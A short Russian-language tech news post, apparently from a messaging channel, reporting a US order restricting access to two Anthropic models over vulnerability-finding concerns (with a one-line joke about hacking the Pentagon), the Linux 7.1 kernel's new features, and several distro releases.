- Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5. Основная причина - модели могут искать уязвимости в софте. Однако, как заявляет Anthropic, другие модели, которые доступны сейчас, тоже могут это делать, и непонятно, почему ограничения коснулись конкретно их моделей. Пока они работают над восстановлением доступа с юридической стороны, можно попробовать взломать Пентагон с помощью Gemini
¯\_(ツ)_⧸¯.- Релиз ядра Linux 7.1. Из интересного: новый драйвер ntfsplus, первая стадия прекращения поддержки CPU i486, удаление старых Ethernet-адаптеров, протоколов и драйверов, удаление протоколов ISDN и AX.25, включение по умолчанию механизма Intel FRED, поддержка BPF-обработчиков в io_uring, оптимизация подсистемы подкачки, поддержка субпланировщиков в sched_ext, ввод/вывод в режиме zero-copy в драйвере ublk, ioctl-операция “shutdown” в Btrfs, динамическое переключение режима производительности в драйвере amd-pstate, поддержка xattr для Unix-сокетов.
- Релизы дистров и ОСей: Alpine Linux 3.24, GentleOS (с ретро GUI, для ОЧЕНЬ винтажных ПК), Proxmox Mail Gateway 9.1.
Также у меня появился канал в MAX, присоединяйтесь!
👍3